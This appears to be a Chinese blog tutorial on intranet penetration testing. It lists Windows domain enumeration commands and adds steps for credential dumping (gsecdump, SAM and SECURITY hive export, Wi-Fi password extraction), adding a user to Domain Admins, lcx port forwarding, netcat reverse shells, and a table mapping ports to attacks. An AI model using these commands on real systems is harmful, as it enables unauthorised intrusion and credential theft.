内网渗透测试基础知识

发表于 | 更新于 | 分类于 | 评论数: | 阅读次数: | 阅读次数:
本文字数: 25k | 阅读时长 ≈ 23 分钟

内网渗透基础知识

0x01

了解一下内网的ip分配

内网常用的三种ip:
A类 10.0.0.0–10.255.255.255
B类 172.16.0.0–172.31.255.255
C类 192.168.0.0–192.168.255.255

域控制器

域控制器是指在“”模式下,至少有一台服务器负责每一台联入网络的电脑和用户的验证工作,相当于一个单位的门卫一样,称为域控制器(Domain Controller,简写为DC)

在域中拥有最高权限,它能对域中的所有计算机进行操作和管理。

0x02

内网中常用的系统命令

1
2
3
4
5
6
7
8
9
tracert IP    //路由跟踪 
route print    //打印路由表 
arp -a          //列出本网段内所有活跃的IP地址 
arp -s (ip + mac) //绑定mac与ip地址 
arp -d (ip + mac) //解绑mac与ip地址 
nbtscan -r 192.168.16.0/24//通过小工具nbtscan扫描整个网络 
netsh firewall show config    //查看防火墙策略 
netsh firewall show state     //查看防火墙策略
for /l %i in (1,1,255) do @ping 192.168.10.%i -w 1 -n 1 | find /i "ttl" //探测存活主机
windows操作命令
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
net group /domain                          //获得所有域用户组列表
net group xxx /domain              //显示域中xxx组
net group xxx /del /domain         //删除域中xxx组
net group xxx nx /del /domain      //删除域内xxx组中的成员nx
net group xxx /add /domain         //添加域中的群组xxx
net group "domain admins" /domain  //获得域管理员列表
net group "enterprise admins" /domain //获得企业管理员列表
net localgroup administrators /domain //获得域内置administrators组用户
net group "domain controllers" /domain //获得域控制器列表
net group "domain computers" /domain //获得所有域成员计算机列表
net user /domain   //获得所有域用户列表
net user xxx /domain //获得账户xxx的详细信息
net accounts /domain //获得域密码策略设置,密码长短,错误锁定等信息
net view /domain     //查询有几个域,查询域列表
net view /domain:xxx //查看xxx域中的计算机列表
nltest /domain_trusts  //获取域信任信息
net user domain-admin /domain //查看域管理员登录时间,密码过期时间,是否有登录脚本,组分配等信息
net config workstation  //查询机器属于哪个域
net time /domain     //查询主域服务器的时间
echo %logonserver%   //查看登入到这台服务器的计算机名
net time \\192.168.1.1  //查询远程共享主机192.168.1.1的时间
net use \\ip\ipc$ password /user:username@domain //ipc$域内连接
net view \\xxx.ggg.com  //查看域控共享情况
dir \\dc2.backlion.com\SYSVOL /s /a > sysvol.txt  //列出sysvol日志记录 
xcopy \\dc2.backlion.com\sysvol.txt sysvol.txt  /i  /e  /c//远程拷贝到本地sysvol日志 
net user  /domain  bk bk123                 //修改域内用户密码,需要管理员权限 
net  localgroup  administartors   SEZKL\backlion  /add     //将SEZKL域中的用户backlion添加到administrators组中 
mstsc /admin                 //远程桌面登录到console会话解决hash无法抓出问题 
gpupdate/force                  //更新域策略 
psexec  \\192.168.1.3 -u administrator -p bk1234 -c gsecdump.exe -u //从域服务器密码存储文件windows/ntds/ntds.dit导出hash值出来 
gsecdump  -a      //获取域登管理员登录过得hash值,这里gescdump为第三方导出AD域的hash值 
tasklist /S ip /U domain\username /P /V    //查看远程计算机进程列

普通域用户提升为域管理员:

net group "Domain Admins" xxx /add /domain

敏感数据和目录
1
2
3
4
5
6
dir /b/s config.*	//查看所在目录所有config.为前缀的文件
findstr /si password *.xml *.ini *.txt	//查看后缀名文件中含有password关键字的文件
findstr /si login *.xml *.ini *.txt	//查看后缀名文件中含有login关键字的文件
copy con 创建命令:	
copy con  ftp.bat	//创建ftp.bat批处理,然后输入ifconfig等命令,按ctr+z退出,并创建成功
copy con  test.vbs	//创建test.vbs脚本,输入脚本后,按ctr+z退出,并创建成功

0x03

基本内网渗透命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
ipconfig /all  //查看ip地址
ipconfig /release //释放地址
ipconfig /renew  //重新获取ip地址
whoami  //查询账号用户名
whoami /all  //查看sid值
systeminfo  //查询系统以及补丁信息
tasklist /svc  //查看进程
taskkill /im 进程名称(cmd)  //结束进程
taskkill /pid[进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程)
wmic qfe get hotfixid  //查看已安装的补丁
wmic qfe list full /format:htable > hotfixes.htm //详细的补丁安装
wmic qfe     //查询补丁信息以及微软提供的下载地址
net start    //查看当前运行的服务
net user     //查看本地组的用户
net localgroup administrators  //查看本机管理员组有哪些用户
net use   //查看会话
net session  //查看当前会话
net share    //查看SMB指向的路径[即共享]
wmic share get name,path   //查看SMB指向的路径
wmic nteventlog get path,filename,writeable //查询系统日志文件存储位置 
net use \\IP\ipc$  password  /user:username      //建立IPC会话(工作组模式) 
net use  z:  \\192.168.1.1      //建立映射到本机Z盘 
net time \\172.16.16.2        //查询共享主机的是 
at \\172.16.16.2 13:50 c:\windows\2009.exe      //在共享主机上执行 
netstat  -ano      //查看开放的端口 
netstat -an | find “3389”   //找到3389端口 
net accounts      //查看本地密码策略 
nbtstat –A ip      //netbiso查询 
net view      //查看机器注释或许能得到当前活动状态的机器列表,如果禁用netbios就查看不出来 
echo %PROCESSOR_ARCHITECTURE%        //查看系统是32还是64位   
set                              //查看系统环境设置变量 
net start                     //查看当前运行的服务 
wmic service list brief             //查看进程服务 
wmic process list brief         //查看进程 
wmic startup list brief       //查看启动程序信息 
wmic product list brief           //查看安装程序和版本信息(漏洞利用线索) 
wmic startup list full         //识别开机启动的程序 
wmic process where(description="mysqld.exe") >>mysql.log  //获取软件安装路径 
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan showprofiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %jkey=clear  //一键获取wifi密码 
if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell) //查看是否支持posershell 
qwinsta                       //查看登录情况
set KB2829361=MS13-046&set KB2830290=MS13-046&set KB2667440=MS12-020&set KB2667402=MS12-020&set KB3124280=MS16-016&set KB3077657=MS15-077&set KB3045171=MS15-051&set KB2592799=MS11-080&set KB952004=MS09-012 PR&set KB956572=MS09-012 巴西烤肉&set KB970483=MS09-020 iis6&set KB2124261=MS10-065 ii7&set KB2271195=MS10-065 ii7&systeminfo>a.txt&(for %i in (KB952004 KB956572 KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165 KB958644 KB2667402 KB2667440 KB2830290 KB2829361 KB3045171 KB3077657 KB3124280)do @type a.txt|@find /i "%i"||@echo %%i% Not Installed!)&del /f/q /a a.txt //windows未打补丁情况

导出注册表的命令

1
reg save hklm\sam sam.hive & reg save hklm\system system.hive & reg save hklm\security security.hive

0x04

内网测试中代理与端口转发

正向代理

Lhost ——> proxy ——> Rhost
正向代理

反向代理

Lhost <——> proxy <——> firewall <——> Rhost
反向代理

windows lcx端口转发
lcx常用命令
1
2
3
4
5
6
1: -listen <ConnectPort1> <TransmitPort2>
监听p1,接收由p2转发过来的数据 
2: -tarn <ConnectPort> <TransmitHost> <TransmitPort>
端口转向功能,通过访问该端口可以直接与该主机或另一台主机的某一个端口进行通信
3: -slave <TransmitHostB> <PortB> <TransmitHostA> <PortA> 
端口转发功能,将目标A机上的端口A,转发到外网B机的端口B上

内网上执行:
lcx.exe –slave 192.168.100.101 8888 192.168.100.111 3389

NC反弹CMDshell(netcat)

靶机上输入:
nc.exe -l -p 8888 -e cmd.exe
将cmd.exe转发到8888端口

攻击机输入:
nc.exe -nvv 192.168.100.101 8888
连接到靶机的8888端口(获取cmd.exe的执行权限)

反向连接:

攻击机输入:
nc.exe -l -p 8888
监听本地8888端口

靶机上输入:
nc.exe -e cmd.exe 192.168.100.100 8888
将靶机的cmd.exe转发到攻击机的8888端口

0x05

端口与服务

端口号 端口说明 攻击技巧
21/22/69 ftp/tftp:文件传输协议 爆破\嗅探\溢出\后门
22 ssh:远程连接 爆破OpenSSH;28个退格
23 telnet:远程连接 爆破\嗅探
25 smtp:邮件服务 邮件伪造
53 DNS:域名系统 DNS区域传输\DNS劫持\DNS缓存投毒\DNS欺骗\利用DNS隧道技术刺透防火墙
67/68 dhcp 劫持\欺骗
110 pop3 爆破
139 samba 爆破\未授权访问\远程代码执行
143 imap 爆破
161 snmp 爆破
389 ldap 注入攻击\未授权访问
512/513/514 linux r 直接使用rlogin
873 rsync 未授权访问
1080 socket 爆破:进行内网渗透
1352 lotus 爆破:弱口令\信息泄漏:源代码
1433 mssql 爆破:使用系统用户登录\注入攻击
1521 oracle 爆破:TNS\注入攻击
2049 nfs 配置不当
2181 zookeeper 未授权访问
3306 mysql 爆破\拒绝服务\注入
3389 rdp 爆破\Shift后门\0708
4848 glassfish 爆破:控制台弱口令\认证绕过
5000 sybase/DB2 爆破\注入
5432 postgresql 缓冲区溢出\注入攻击\爆破:弱口令
5632 pcanywhere 拒绝服务\代码执行
5900 vnc 爆破:弱口令\认证绕过
6379 redis 未授权访问\爆破:弱口令
7001 weblogic Java反序列化\控制台弱口令\控制台部署webshell
80/443/8080 web 常见web攻击\控制台爆破\对应服务器版本漏洞
8069 zabbix 远程命令执行
9090 websphere控制台 爆破:控制台弱口令\Java反序列
9200/9300 elasticsearch 远程代码执行
11211 memcacache 未授权访问
27017 mongodb 爆破\未授权访问

文章引用

-------------本文结束感谢您的阅读-------------
各位帅哥,美女!有人捧个人场,有钱捧个钱场!